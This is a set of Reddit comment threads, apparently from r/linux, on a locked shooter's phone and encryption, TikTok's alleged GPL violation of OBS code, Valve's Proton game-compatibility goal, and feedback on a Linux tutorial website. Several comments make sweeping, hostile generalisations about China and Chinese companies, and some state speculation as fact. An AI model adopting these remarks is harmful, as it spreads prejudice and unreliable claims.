Of course. It seems to be an annual thing.
Remember when Prime minister May tried to ban encryption and had to quietly back down after she was told all online banking would become insecure.


I do.
[deleted]
You've got to wonder if getting into their phone is even necessary
Just bring it to Australia, [where our law can beat the laws of mathematics](https://www.gizmodo.com.au/2017/07/prime-minister-says-the-laws-of-australia-can-beat-the-laws-of-math/).
It seems politicians use tragedy as a reason to limit our freedoms
\>encryption is dangerous

What is this 1984
I wonder how many people are aware that banning encryption is literally banning the use of math with large prime numbers. People are going to look back at this like that time Indiana passed a law declaring that pi be equal to exactly 3.2.
>Combs declined to specify what type of phone Kelley had.

>"I don't want to tell every bad guy out there what phone to buy, to harass our efforts on trying to find justice here," Combs said. "I can assure you that we're working very hard to get into the phone, and that will continue until we find an answer."
[deleted]
[deleted]
How much you want to bet it's already been cracked. The dude in charge of it dropped it while he was in the bathroom.
I don't think so. 

I knew the age of terror-panic was over when Apple refused to decrypt the San Bernadino shooter's phone, and people weren't calling for the imprisonment and torture of Tim Cook. 

People don't care anymore.
Maybe they should just forbid shooting people if they think a law will help.
They know the shooter and the motive, why do they even need to check his phone? 
They just need to wait for a vulnerability. Every device will get cracked eventually through some poorly written software.
My 12 year old nephew just installed Kali. I can send him around for a hour if they are really stuck and want help. 
Encryption is a must,there are no back doors in encryption just a security hole.
IPhone uses a "x strikes and you're​ out" system to stop people trying lots of codes. What stops us from copying/restoring the (encrypted) contents of the storage/memory first so we can have unlimited tries?
Its that damn constitution.   The founding fathers couldn't have imagined cell phones, so they shouldn't be protected by the constitution. 
It's a shame that there have been so many mass shootings that when you say "Texas shooter" my first thought is "which one was that again?"
>saying how encryption is dangerous 

Solution: Declare second amendment rights (in this context of the USA) and that you need encryption for your militia.
Didn't they just contract some Israeli company last time this was an issue for them? It seems like they just want to make a public spectacle of it. 

Edit: NVM, looks like it was not that simple: https://en.wikipedia.org/wiki/FBI%E2%80%93Apple_encryption_dispute#FBI_withdrawal_of_request
Ok 2 things:

Tom Scott is the only person I've seen who has half a chance of explaining this to the lay person - [check out this video](https://www.youtube.com/watch?v=CINVwWHlzTY)

Secondly, sometimes I wonder whether encryption should be on by default in WhatsApp.  There's no going back now, but most terrorists are so stupid they probably don't know whether they're using it or not.
[deleted]
Here's just hoping they get in in time to stop him from doing any more harm.
The more they push for backdoors the greater encryption will be used. Even years before Snowden a few of us already knew what the NSA was doing and we were paranoid. Now that more people know and are paranoid using encryption is getting Soo much easier.
What would they learn if they were able to get in? Plans for another attack? Determine if he acted alone?

Why not use the NSA to figure out what went on with his phone. Who he called, who he texted. I mean, we're dumping billions into that and other security black projects.

(I should add, I'm not pro-NSA. I hate it. But if they're using "national security" as an excuse to keep it running, they're doing a piss poor job)
It's clearly because encryption is the cause of America's highest rates of gun deaths. Please send your hopes and prayers towards solving this big encryption problem!
You really expect me to believe the NSA doesn't already have ten vulnerabilities and six back doors that would work?

Sure you can make things a bigger pain in the ass for them if you try but I don't think there's a single truly secure device in existence.
Just get it into the average American's head that encryption equates to digital guns and that the gubmint shouldn't be taking it away.
Is this becoming a moot point now with the new phones using face recognition and fingerprints to open the phone.  All they will have to do is place you phone in front of your face to unlock it.  They can also force your finger on your phone to unlock it.
So it's okay to use a tragedy to push politics on technology but not guns? Hmm. 
So maybe next time, police will be unable to enter shooter's house in time, therefore door locks will be banned in America? Or maybe someone will find shooter's diary, and at some point it will say "I freaking love ice cream", thus ice cream will be banned?

Or maybe (just maybe, pardon for my silliness), just make people pass some kind of psychological test before getting right to own a FREAKING ASSAULT RIFLE? :)
Like they can't go through his call records via PRISM.  If they're having problems with that than clearly there's more to this story. 
Same with gun control
Yeah but, why the fuck does it matter if they get into his phone? Are they going to stop him shooting more people? Pretty sure that's been taken care of. It seems like a pointless effort at this point. 
da gubberment neez da batjoor
Or John McAfee will get 10 secs of press claiming he can crack it. He's now running a pump-n-dump penny stock scam so he's very credible in cybersecurity 
"I don't want to tell every bad guy out there what phone to buy, to harass our efforts on trying to find justice here," Combs said.

I lol‘d so hard
Proprietary encryption, not even once
Why does the government seem hell-bent on taking away any and all protections we citizens have at our disposal?
 
I love how after these shootings we spend more time and effort scrutinizing the device the killer used to *communicate* before the killing than we do the device they actually used to *do* the killing.

EDIT: Why this is in /r/Linux I dunno...
Why don't they hire the same Israeli company to do it for them?

Edit: Also why can't they use his fingerprints to unlock that phone? I say do it if his body is still in the freezer or dig him up. lmao
Can someone educate me on what type of phone this is so I can buy it?
Really, what kind of phone is he using that they can't get into it?
Man, if only he didn't use the phone to murder so many
Maybe the shouldn't have killed the person who could unlock the phone by court order? We have so many ways we could take people down non-lethally, maybe the authorities should be investing in more powerful ways to apply non-lethal weapons of they want to unlock someones phone.
"Encryption is dangerous. We should sacrifice a little freedom for safety."

"Guns are dangerous. But we shouldn't have to sacrifice our freedom for a little safety."

logic 2017.
Why can't they just use the dead guys thumbprint to open it 
Give them some time. They will reach out to contractors, and it will get defeated just like last time.
Pretty sure we've been calling this MINIX / Intel ME for the last 10 years...
Just say all guns need to be registered. Oh wait that won’t happen either. 
The guy was a nutjob. What are they honestly expecting to find?


One would think that their most elite intelligence gathering organization's bag of tricks haphazardly left on some server and then causing a shitstorm in corporate America would settle that argument in a fucking hurry.

Are they fucking serious? Here's a clear example when the US "gun control" has failed so they talk about how encryption hinders their efforts to "find justice"? Seriously What The Fuck!?
Yup, we'll all focus on this trivial detail instead of how much easy access to guns he had.
Anyone know what phone they can't break into?
[https://news.ycombinator.com/item?id=29592103](https://news.ycombinator.com/item?id=29592103)

[https://twitter.com/Naaackers/status/1471494415306788870](https://twitter.com/Naaackers/status/1471494415306788870)

TikTok's new streaming software for PC contains GPL code compiled into the binaries. And the source code is not available.
Poor OBS, they have been getting shit on pretty hard lately, give them a break :(
Can anyone show me email template about GPL so I can send to Tiktok to ask them showing the source code?
Tiktok ripped off voice actors voices for their text to speech they don't give a single shit about copyright
This is not the first illegal fork of OBS, either, is it?
BREAKING NEWS: China doesn't give a fuck about copyright or intellectual property and there will be 0 consequences for this.

Wow!
While having the source publicly available on github or similar is the most _common_ way to be compliant with the GPL, as long as the users can write to the company and get a DVD of the source, or something similar, they are compliant

So just showing they are using the OBS source isn't, _technically_, enough to prove a license violation.  There are other hoops to jump through.

A similar thing happened to MS, they released a tool for burning Windows ISOs to DVDs and it turns out the contractor who wrote it for them used an open-source DVD burning library.  The solution was that MS open-sourced their tool after they were alerted.
Is anyone actually surprised by this?
well at least there are legal groups in open source with deal with this shit

such as the software freedom law center

[https://softwarefreedom.org/](https://softwarefreedom.org/)

and the software freedom conservancy

[https://sfconservancy.org/](https://sfconservancy.org/)

&#x200B;

given that copyright is not going anywhere open source projects should enforce thier lisenses in a court of law as well

&#x200B;

and regardless of what you think about trump he did the same exact shit with mastodon
So take some real action and go DMCA it then. "GPL shaming" rarely works. A DMCA complaint, on the other hand, will get attention in a New York minute.
The moment China gives a shit about copyright I'll eat my hat.
Is it released yet? It just needs to use gpl upon release..
I'm glad u found out about this hopefully they respectfully show the source code
Man, OBS really can't get a break, huh.
Lol China stealing western intellectual property again, these is second nature to them, not surprised at all
[Streamlabs talking with Tiktok in 2 years](https://www.youtube.com/watch?v=CBri-xgYvHQ)
JIN YANG!!!!!!!!
Actually screw you tiktok, this is messed up
r/StallmanWasRight
China has never cared about US IP law, including the GPL. It'd be nice if someone stood up to them, but we never will because they own us, at least economically.
TikTok is a Chinese company. Like a lot of Chinese companies, following the law, regulations and licensing  is not a priority at all for them.
Chinese company steals shit and abuses power, BIG FUCKING SHOCKER.

Have fun trying to sue them!
I'm surprised that this comment section is surprised by a Chinese company pulling that shit.
Lmao.. Since they are a Chinese company, they don't give a shit on copyright laws.
China stealing software??? Why I’ve never heard of them stealing anything in my entire life!!

Massive /s ofc
Can someone explain how they discovered this. I'm having a hard time understanding how to find open source inside closed source.
As soon as i heard about this i wondered if they had pulled a StreamLabs
Donald Trump could've accomplished just *one* great thing by outright banning TikTok, forcing them to become beholden to our IP laws or pushing them out of the largest Western market entirely. He didn't, and I'm still butthurt about it.
[removed]
[removed]
Its Chinese. They don't follow rules. Fking one China policy and what not
there should be a law that makes it legal to use their forked source if it leaked due to a hacker attack. imagine all their smug faces frown when all the laws they ignored are now ignoring their hurt egos.
Right. It seems they start the GPL software as a separate service, so it will probably be sufficient to provide the source code to the service, or fork of it. Of course people love to hate tiktok, China and so on, and that’s fine, I guess, but without knowing more details this doesn’t seem like a huge problem going forward.
>china

>giving a fuck about gpl

China is a shit country and these chineses corporations are a shit too. You guys think you can do some about that? Do you think they will care about the emails they receive about this issue?

Forget!
So can u not download the live studio app anymore??? I can enter the page on my phone but there no download and on pc it just redirects it to foryouoage on www.tiktok.com/foryou
To all the people trying to pander clickbait responses; If litigation gets passed in the U.S., China's government absolutely has an obligation to enforce this against Chinese companies. The bigger question is "if" they would enforce against tiktok, as in if tiktok had corrupt ties to the government. Which is something that huawei has already been proven to have multiple times by intelligence agencies. So tiktok could potentially be immune, or at most get a slap on the wrist.
so is streamlabs obs
While initially constructive, the responses had quickly become something for pouring hate and biased inspiration and flawed arguments, which are no longer about the topic of tiktok violating GPL. It's really ironic that this happens on this subreddit, especially with the rules being.
I dont want anymore tiktok. I just want to be nerd
It's not an fork. It's a electron app. This link is for some reason in the installer part, yes. The installer itself is also completely different from the OBS one. Please do not spread lies here. Fact-check things.
[removed]
Isn't the whole point of OBS to be open source. Therefore the streaming software isn't an illegal copy UNLESS they make money off of it. Nevertheless, it's not my problem just thought I would put my two cents.
[deleted]
Highly missed video put out by steamworks today: [link](https://www.youtube.com/watch?v=5Q_C5KVJbUw)  At about 2 min he states their goal is to adapt every API and get every windows game working before the Deck launches (December).  Have proton devs stated any goals this lofty in the past?  I mean, they've done some amazing things so far.

Like, even if ~~your~~ you're not interested in this deck thing, and even if we don't actually get *every* game running well, this whole thing's been very good for linux gaming.
Would love to see that happen, most games already run pretty good, the biggest issue I personally see is those anti cheat softwares some games use.
Bro..... If valve actually pulls this off.... Every device in my house will be on Linux.

I only tolerate windows because of gaming. That's it. If that's no longer a problem, I'm out.
I think Valve is over-promising, but I am also hopeful that valve will make progress.

In 6 months the three big complaints will be this:

1. The anti-cheat will depend on closed source kernel modules. 
2. Lots of games will still have compatibility issues with Proton.
3. Something something free software.

All in all, I think this is a big step forward for the Linux ecosystem, but I also predict the kernel modules will be extremely controversial, and for good reason.
I know there was the big year of Linux desktop meme, but gaming as a thing is something that can actually even the odds.
> Like, even if your not interested in this deck thing, and even if we don't actually get every game running well, this whole thing's been very good for linux gaming.

Yes, that's why I hope the Steam Deck will be a great commercial success, although I myself am not interested in one.
Thanks Valve, I'm a libre software advocate but you've got my loyalty (unlike GOG that can't bother release GOG Galaxy on linux).
I wonder what they are going to do with the myriad of Asian MMOs out there that feature the most obscure anti cheat software you will ever imagine.
Is this how heaven looks like?
First off: HUGE. All of this. And at the pricepoint this is at, it really has the potential to gain some marketshare from the harder core PC gamers that want something on the go, but don't want to get a switch because theyd have to buy every game a second time.

With that said, i'm pretty sure they are only talking about steam games. While that's certainly a large portion of the market, there are several really popular games that aren't on steam and wether they benefit from this remains to be seen.

But yes, I'm stoked valve decided linux is what they'll go with, even though windows would have been the easier option. If anything it proves to developers that valve is commited to this and is putting out hardware to support this. Having fully supported first party hardware is a major step in getting game developers to take linux seriously. Add to that that valve is trying to support them as much as possible in getting their stuff to run and we might be in for a major step forward, again.
Yeah frankly Valve has overcome every objection that I could have to buying the thing so I'm going to get one.

Normally, I don't buy hardware that I can't control

>no bootloader locking, you can install your own os

Well, but I'd still pay the windows tax...

>it comes with an arch-based linux distro

Ok but android is technically linux-based, doesn't mean the experience is any good

>it runs kde plasma, which you already run on your other computers because it kicks ass

Ok, fine, but the storage on the 400 dollar one is only 64 gigs

>sd card slot allows expansion

Well, that's fine, but...

>headphone jack

>proton enables windows game compatibility

>the company made Half Life

Ok yeah I'll buy one. None of my usual "get out of buying it" excuses work.
If Destiny 2 could run on Linux without me getting spooked by the Bungie ban hammer, that would be great. I don't want to dual boot, I want to get away from Windows for good :(
If I understand correctly, proton is Valve's own adaptation of wine.

Will proton being compatible with every game on windows also make it available with essentially every other "graphics heavy" software? i.e. CAD and video editing software?
is it just me or is valve making some big fucken moves?
I love Valve and all the devs who have contributed to Proton, I think of them as God-tier programmers frankly with the kind of challenging work they are doing.

That said, even I think that sounds overly ambitious. There are some games that surely will just never be playable.

Put it this way. **There are some Windows games that don't run on Windows.**

It might be a bit much to expect 'Every' Windows games to be playable via Proton.

That said, I love their enthusiasm, and look forward to seeing what they achieve. I'd be satisfied with simply having anti-cheat working in Proton, and needing to use fewer launch parameter hacks.
Proton is already pretty damn good, wine has improved a TON. Compatibility is sketchy mostly due to DRM and anti-cheat measures.

I doubt they'll reach 100%, even if that is their goal. But even 95% would be pretty good and seems entirely possible. Also keep in mind that Steam actually has quite a few games that are pretty much broken on Windows already.
I mean they already support 70% of the games. Games with anti cheat doesn't support. Hope it gets solved.
I'm generally sceptical about bold plans such as these, but if they can pull off having every title in the Steam catalogue playable without obvious problems I will be very impressed.
I don't care if my comment is r/hailcorporate material: Valve is fucking awesome.
They should rush to whitelist more games, I know a few games that only runs on specific versions (like proton 3).
[deleted]
Wow. If they accomplish this, i will finally be able to switch to linux 100%. I have windows only to play games 😑
burn windows and drm to the ground once and for all.

you'll have my support till the end of my life.
Omfg. Valve, gaben I am forever yours. All hail lord gaben who has delivered us from evil and freed us from the shackles of windows.
Did they solve the anti-cheat problem? Last I checked EAC still does not work with Proton and subsequently so don't games that use it. Games like PUBG, Apex Legends and Rainbox Six Siege are some of the most popular games on the platform.
On the whole I don't buy consoles. But I might by this if it gives me an easy way to play and stream games around the house or to friends.
Games no longer a barrier.   Windows 11 suckiness and TPM requirement.  Mac x86 owners feel they may get abandoned?  Hardware prices increasing with chip prices.

Is 2022 the year of the linux desktop?
Windows in the mud....love to see it.
[deleted]
They have to. We all know Microsoft is trying to lock down future Windows to only support Xbox gaming.
[I'm just gonna leave this conversation here](https://old.reddit.com/r/linux/comments/okx92o/steamdeck_will_be_running_linux_steamos_30_is/h5b178c/?context=3), because reddit...

> There's no way this isn't gonna have a big impact on Linux gaming
Just a reminder that money talks so if you really want to see Valve solve anti-cheat etc go reserve a Steam Deck!

https://store.steampowered.com/news/group/39049601/view/2986431641634388284
Microsoft will probably launch DirectX 13 or some crap like that to screw Valves plans
If Proton can get more support and I can play online games like CoD or GTA then I'm ditching Windows. With the intro of windows 11 and their continues dig into forcing them to play their game like Apple does I really want to leave. Idgaf about this portable controller tbh.
Gta v online is not working for me so im waiting :(
Wowowowowowowowowowoowowowowowow hypeeeeeee , pls dont lie to me, be gentle
I assume they mean every game on Steam. There are some non-steam games that will probably never work, like Modern Warfare 2019. There is speculation that the game actually checks if you're using WINE, and changing file names to make it less obvious doesn't seem to help.
Another nail in the Windows coffin.
VALVe making these two simple rules probably would have made 99% of Steam games work on Linux, while requiring basically zero extra coding effort from game developers:

1. If a game goes out of its way to not work on Linux, then it's not allowed on Steam
2. If the only reason a game isn't playable on Linux is its DRM, anti-cheat, and/or anti-tamper, then it's not allowed on Steam
i wish riot games and epic games does the same.. if play valorant, lor and epic games titles, i would be so happy to delete windows and use linux again..
When are they going to address the Windows Media Foundation issues?
Valve ily

I do hope that they make sure they all work though lmao, the radio in New Vegas and FO3 doesn't work under Proton which is a shame as imo they add a lot to the wasteland
big if true
I think the biggest work was doen with the syscall user dispatches for version 5.11. Once the kernel can do that, one can strt mapping them to the functionality.
I can't see Valorant or the newer Call of Duty games running unless half the globe owns a Deck.  Especially with Vanguard anti-cheat in Valorant.
Isn't this post better suited to /r/linux_gaming?
I just love how open Steam Deck is compared to the Nintendo Switch.
I wish them luck even as I slam X for doubt.
Well, goals are neat. If someone thinks that one is realistic, I've got a bridge to sell you.

If we limit this to games on Steam (no Valorant and other such snowflakes) and assume they somehow magically get **all** games that only include Windows versions of EAC or Battleye  to work (which I rather doubt they can legally do), then I suspect the biggest group of games with issues would be MMORPGs.

Most MMOs are at best rated Gold on protondb. Getting them to run, and *run well enough*, is too much research and tweaking for the majority of users.
That would be more than awesome... I could finally get rid of Windows... its annoying that you still have programms that need a windows VM.
I thought they said EAC support was still a while off which gets in the way of that goal
So much yes, I almost stopped gaming, stuck in between never wanting anything to do with Windows ever again and almost all the games not working in whatever proton I throw at them.
that's quite a daring promise. even if they don't managed to fulfill the promise by that time, as long as I heard good things about the games I owned in steam, I'll be happy
Yeah, that won't happen. You can't even play every windows game on Windows. They should've said "most" instead of "all". Never understood why companies have to overpromise things.
Deck, I'm buying you!
Now that just made my day!
I wonder what the standard for "playable" is. I love racing games, but the Crew 2 is borked, and FH4 is barely playable with all the correct settings applied and frame rate locked to 30.

Currently, FH4 is rated as 'Silver' over on [protonondb.com](https://www.protondb.com/ ). Is this what Valve considers "playable"? I hope not.

I would love nothing more than their claim all "all steam games are playable on the Linux", but man, that's some crazy ambitious stuff
Looks a bit unrealistic considering the steam library, but proton did made it easy, well see.
They either have a nice card hidden inside their sleeves -or- its just merchandising shenanigans.
What is current state of HDR on Linux? I'd love to get rid of windows if Linux steam gets anti cheat and hdr to work.
If they manage to do this, I might just buy a deck to say thank you
Man it's a good year to own an AMD GPU. Or I guess, 2022 will be a good year to own an AMD GPU. (Year of the Linux desktop?)
every? including multiplayer would be a lot, but very exciting
That would be amazing. I switched to linux because I got tired of various problems with windows and because I reconized that it was unsafe to stay on windows 7 (and I reconize that i destest windows 10 enough to never use it and really didn't like windows 8 either). But when I switched I had to accept that some things I would ultimately have to rely on other game systems to play. Getting all of the games that windows  has would be great and would make it so that I didn't actually sacrifice anything to be on linux. Although I might need to get a better computer if I'm going to be able to play more steam games.
Year of the Linux desktop!
isn't TF2 dying because of linux VAC rn?
I mean they can't really avoid making them anti-linux, since SteamOS is a linux-based OS
I’m loving this Steam Deck Arch/Proton for the masses
I will laugh then because there's a bunch of Windows games which don't work on Windows right now. I've been stuck with Win10 for the moment because my old computer's MB died, and the laptop I bought to replace it I wasn't able to get the wireless or ethernet to work. I haven't had the time to try and figure it out so I can get rid of the windows malware again. 

About half the games I've tried black screen and lock up. Others run  like I am on a 486. For an i7 and a 3080, that's unacceptable. Considering my old system, I almost never had any issues running anything in WINE, including many of the same titles that now don't work in Windows, it's insane. 

If Valve pulls this off, then it will mean that Linux will have better compatibility with Windows games than Windows.
I wonder how many people will just install Windows on it instead.
SteamOS uses Arch btw
Is Linux HDR support a thing yet? Because if yes and if what valve says is true, I‘m finally yeeting Windows for good
It won't be every game. They can have that goal, but they won't. Yes they are trying to work with EAC and BattleEye, but there are other games that won't work. For example Valorant will NEVER work under Proton, not with their Anti-Cheat strategy. To be fair that isn't on Steam though, but there are other games on Steam that won't work under Proton. All you have to do is go look at the stats over at ProtonDB. Heck just recently, I had to use Windows to play Persona 5 Strikers. You can sorta play it with Proton, but you have to disable cutscenes, which cannot be done with in game options (so not consumer friendly), plus it completely ruins the point of playing a heavily narrative focused game. Proton can play a lot, and I'm sure it'll continue to improve, but it'll never support everything.
I think this is more a case of aiming high than a practical commitment to meet that.
If lord gaben does this I'll be buying a console to support the effort. I'll also be loading tons of new games on my Linux pc :)
I'm honestly thinking of going Linux full time with my next PC build. The only thing keeping me dual booting has been windows games.
I hope they fix Nioh 2. Really annoying that all of the cutscenes are broken on Proton
Can this be applied to creative software too please?
literally the only thing holding me back from switching to linux is about to change. 


perfect.
*finally a reason to ditch windows completely*
i dont know any game on steam that dont work on steam play, all my games work
Once they port the software over for Logitech gaming mice and keyboards like the G-13, that would be all I needed to ditch Windows entirely.
This just doesn't seem feasible at all. There might have some of best programmers working around the clock but there's way too many dlls and apis and port. Even getting all the COD games ported would be a slog, even working on top of existing Wine tools and I just can't see it happening. It's so difficult to port a game to Linux that you wouldn't even bother considering supporting Linux when write the first line of code on a brand new project.
They still have SOOO many games to recompile. A couple of days ago I was surprised that Bethesda has the Fallouts and ES still only for Windows
Nintendo: look at this switch thing isn't that nifty?

Volvo & Loonix: MOVE OVER WINDOWS 11
Tfw steam moving over to linux
I wonder how they're going to make games like Forza Horizon work with proton. Really looking forward to it.
Well if that includes apex I would be quite happy
This sounds amazing, but I'm doubting the possibility. Most games running can (and inevitably will) happen. "Every" game though?
im super duper excited for this
I really just want Return to Castle Wolfenstein to work.
This is super great news! Most of the games I currently play already have linux builds but with outdated SDL2/XNA/etc and cannot be ran over wayland resulting in a 1x more buffering. For example stardew valley crashes on some window side thing in SDL_VIDEODRIVER=wayland and dota cannot do Vulkan under wayland. Maybe I could even try out the more polished windows builds under Proton and see if I have better experience running my games that way
That includes Elite Dangerous? Be still my beating heart.
Thanks valve, maybe their work changes nowday windos/linux ratio

Also thanks to this, i hope in future many programs start working on linux (like adobe suite etc.)
We already knew they were working with anti cheat software. As eac has a wine port (squad game is proof) and battleye works a bit with proton experimental now (Arma 3 is starting to work, but it still kicks you out as of 3 months ago, but it took a while though).

I didn't they made the deals aready and are almost done. This is exciting.

Way better than the old news of "We are working with"
What about Game Pass though? I highly doubt any of those games will be playable without Microsoft buy-in. That's a big reason why I'm likely to keep Windows for gaming, the value proposition of Game Pass is just too good to pass up.
i'm honestly *very* tempted to preorder one but i'm probably better off saving my money for something else later
If they can accomplish that goal, which there is good reason to believe if they're making a public announcement about it, that's freaking huge.

The only thing I'm uncertain about is performance parity. I don't play that many titles, but the ones I do play usually tend to have performance issues on Linux.
That would be pretty cool. Gaming is the last thing I still use Windows for.
Honestly this will make me ditch Windows altogether.
I'd be so excited to play apex and gears of war
Holy shit they really claimed that ?
Not sure where the best place to put this is, but I made a website: [www.linuxjourney.com](https://www.linuxjourney.com) to help newcomers learn Linux and I'd really appreciate some feedback.

It's a little more in-depth than some other learning Linux sites, but the reason I made the site was to gain a better understanding of Linux by teaching it to others. 

There are portions for each section for exercises and quizzes (which could use a lot of work). I initially wanted to add an interactive console, but it became way too much work for a hobby site. 

I'd really appreciate any suggestions, comments, etc! :)

Edit: Woah! I wasn't expecting so much awesome feedback, this is fantastic! Thank you all!

Edit 2: I'm beyond ecstatic, thank you reddit for your kind words! You've given me a ton of motivation to work on this site even more!

Edit 3: The site content is available for PRs on GitHub now! [Repo](https://github.com/cindyq/linuxjourney) - still pending a license. Mobile is also a lot better now. Also for those who have asked the site is made with Ruby on Rails, I pretty much just used a single book and some googling. If you want to learn Ruby on Rails, I can't recommend Michael Hartl's Ruby on Rails Tutorial enough :)
This is excellent.  For so long I've been asked how to learn Linux with no good answer.  I've learned by just trial and error and patience.  With enough good resources like this we can fill the void that most universities can't by teaching hands on Linux skills.
The design is fantastic, it is rare to find such a nice looking website.  
The only thing I noticed from a quick look is, that once you are in a section you cannot go back to the root of the page "where expected" (I would expect a larger centered or left top button for that, no objective reason, just intuition) . Maybe you can add some kind of "House" without text in left-top oriented position for that  
And optional ideas:  
As an example for a signal in the process section you can probably add in detail how to pause/resume a process and how to see the progress of a running "dd" process, that should be the two most common examples of putting them to use?  

Do you have the source hosted / accept contributions?
I propose... no I DEMAND ! that this website be pinned to all the linux related subreddit. Starting from linux4noobs, passing by this one ending to ~~linuxmaterrace~~ lenuxMustardRaze.
I just looked at the distro selection part so far. Of course, everyone could make an argument for adding the distro they use. But, I have a rather strong argument for adding at least one more: openSUSE. It is one of the oldest distros and still quite popular. You can even use distrowatch.com as a rough guide for popularity. It's also a great distro for newcomers. Centos is also worth mentioning, at least in passing on the RH page.

Another thing I would add is a little more info about the package managers the distros use, such as zypper, apt-get, and dnf (previously yum on RH distros). 

Mint has a debian-based spin as well that should be mentioned, and ubuntu is based off debian *testing* I believe, which is a tidbit you can add. 

Lastly this is a big one, if you haven't included it already it would be nice to have an overview of the DEs. Compare their underlying architecture (GTK, QT) and then mention which distros use which.
The "code" boxes aren't mobile friendly. Other than that it's really nice
Does not look good on small screen, some modifications on bootstrap should improve it.
And, well, thank for all the effort.
Great work overall, very nice design! I'll add any inconsistencies I find below:

* You can probably find a js shell implementation (like uni.xkcd.com but real)
* https://linuxjourney.com/lesson/filesystem-types: "This also increases the boot time because instead of checking the entire filesystem it just looks at your journal." This should say decreases boot time or provide a different explanation (I'm not sure which one is correct).
* https://linuxjourney.com/lesson/boot-process-bios "The BIOS is a firmware that comes most common in IBM PC compatible computers, the predominate type of computers out there today." Predominate -> Dominant, or change the wording a bit


[deleted]
Very very nice, I really like the look and layout of the site. A few things jumped to me straight away:

* you should hide the lesson panel when the user is doing the quiz

* you should probably place the **Home button** somewhere where it's more visible, like around the hamburger menu

*  collapsing the menu is not handled properly and parts of text are still shown, most likely a responsive web design problem
There are a lot of things I'd like to point out:

# Distro choices

## Fedora

> If you want to use a Red Hat based operating system, this is a user friendly version."

Heavily implies that RH is not user friendly (not true!) and that you should only use Fedora if you want a RH-based OS (also not true!)

A newcomer is unlikely to know what Red Hat is or what it means to use a Red Hat based OS.

## Gentoo

>Great for desktop and laptop.

Nothing stops you from using Gentoo on servers or other devices - in fact, hardened gentoo is probably the best choice of linux distro if you're serious about security.

> If you’re just getting started with Linux and want to take a more difficult path, I’d choose Gentoo or Arch Linux as your distribution.

Hm, each to their own... I'd say you'd scare newcomers off completely unless they really enjoy tinkering and debugging.

## Arch Linux

>If you also have a small device such as a Raspberry Pi and need to stick a lightweight OS on it, you can’t go wrong with Arch

Arch does not work on the RPi. archlinux-arm does, but that is an unofficial fork.

# Command line

Ohh boy, my forte.

## echo

Don't teach people echo.

If you want to teach good habits from the start, get people using `printf %s\\n "$var"`. I'm not joking. [`echo` cannot be relied upon to output the contents of a variable](http://unix.stackexchange.com/questions/65803/why-is-printf-better-than-echo).

## cd

> ~ (home directory). This directory defaults to your “home directory”. Such as /home/pete.

"defaults to" -- well, it's *always* the home directory. No "default" about it.

Probably worth mentioning that you can use ~ in any command, as it's part of the shell rather than part of cd.

Also worth mentioning is `cd` (without arguments), which takes you to your home directory too.

## ls

> List Directories

It can be used on single files too (usually with `-l`, to see extended info about the file).

The formatting in the example output is all messed up, the indentation doesn't match properly.

## touch

> Touch allows you to the create new empty files.

"to the create" - typo

Also, it doesn't create files per se. You get the same effect with `:> filename`. Creating a file is only a side-effect of its main purpose, which is to update a file's modification time.

## history

> clear

Probably worth mentioning ctrl+L, which does the same thing in bash.

## cp

> `*` the wildcard of wildcards, it's used to represent all single characters or any string.

A rather awkward definition. What is a "wildcard of wildcards"? How is "all single characters" not covered by "any string"?  I would describe it as "matching any string of any length, including matching nothing at all".

It would also be worthwhile to mention that this too is a feature of the shell and not of cp, so it can be used anywhere. For better or for worse, it works in things like `echo *` or `cd P*res` (← might cd to "Pictures", if you have a folder like that).

## mv

> `$ mv file2 to /home/pete/Documents`

... `to`? That's a mistake.

## help

Don't cover this command, it's rubbish. It's also bash-specific, not even supported in zsh (a very popular and more featureful alternative to bash).

> `$ help ls`

    bash: help: no help topics match `ls'.  Try `help help' or `man -k ls' or `info ls'.

## Alias

Teach people functions instead. (Or as well?) Aliases are very often abused, and writing a function is just like writing any other script while aliases have their own different rules.

> `$ alias foobar=’ls -la’`

You have smart quotes here, which make this a syntax error.

## exit

Mention Ctrl+D.

# Text processing

## env

> `echo $HOME`

Don't teach people bad habits.

1. echo (mentioned before in this post)
2. quote your variables!

Maybe it's worth mentioning non-environment variables too. Variables you set in the shell aren't put into the environment by default, and must be `export`ed for that to happen. Exporting them to the environment lets any newly launched commands from that shell see them.

EDIT: regarding variable quoting, it's necessary to actually be able to pass the value of a variable. *Not* using quotes is equivalent to doing 2 things to the variable:

1. splitting it based on any character in `$IFS`
2. treating it as a glob and expanding it like that.

That means if you had a variable with the content `*    WARNING    *`, and tried to print it with `echo $var`, the fact that it's not quoted will mean that the `*`s get treated as globs and start matching files, so you end up with a very messy message which spits out a load of files into the terminal. Also, the consecutive spaces are all collapsed into one space (because the shell splits the variable by spaces, then echo joins it all with 1 space in between each part).

Try it at home:

    var='*    WARNING    * : Something or other blah!'
    echo $var

## cut

> `$ echo The quick brown; fox jumps over the lazy	dog > sample.txt`

The semicolon ruins the command, and the tab isn't picked up because the shell uses it as an argument delimiter. Quote properly. In this case, use single quotes, because you are doing no variable substitutions.

## head/tail

Merge these 2 pages, they're very similar.

Also mention:

* `head -10 file` -- you can use that as a shorthand for `head -n 10 file`.
* `tail -n +10 file` -- display file **starting from** line 10

## join/split

Turn this into 2 pages. The commands aren't opposite to each other, so grouping them is misleading.

`join` is supposed to join by columns. In your example, you're using it wrongly, and it's identical to `paste -d ' ' file1.txt file2.txt`

`join` only works on sorted input.

EDIT: An example I might give for join:

`says.txt`, what animals say:

    Cat     Meow
    Cow     Moo
    Dog     Woof

`baby.txt`, what their young are called:

    Cat     Kitten
    Dog     Puppy
    Horse   Calf

Note that they're sorted by the first column, which is what we're joining on.

`join says.txt baby.txt` will output:

    Cat Meow Kitten
    Dog Woof Puppy

It looks at the first column, filters it down to what the 2 files have in common, then joins the columns from each file.

It's short for `join -1 1 -2 1 says.txt baby.txt` where `-1 1` means it looks at the first column in the first file, and `-2 1` means it looks at the first column in the second file. Any column can be used as long as the file is sorted correctly by that column.

That said, `join` is not a very commonly used command, so you might not need to go very in depth there.

## sort

> And also sort via numerical value:

There are no numbers here. This example makes no sense.

EDIT: So for a more useful example, you should have something like:

    4 elephants
    19 penguins
    38 giraffes
    1 snail
    2 turtle doves

Without `-n`, that gets sorted into the "wrong" order, but with `-n` it sorts as you'd expect. Without `-n`, 38 comes before 4 because it sees the "3", notices it comes before "4", then sorts based on that.

## uniq

You need to mention here that it only removes *adjacent* unique lines. You should use `sort -u` instead of `uniq` if you can't guarantee that.

## nl

Mention that it doesn't number blank lines by default

## grep

> `$ ls | grep *.txt /somedir `

This is very, very wrong.

1. `ls | grep` is an antipattern
2. `*.txt` is a glob, meaning it will be expanded on the command line into something else
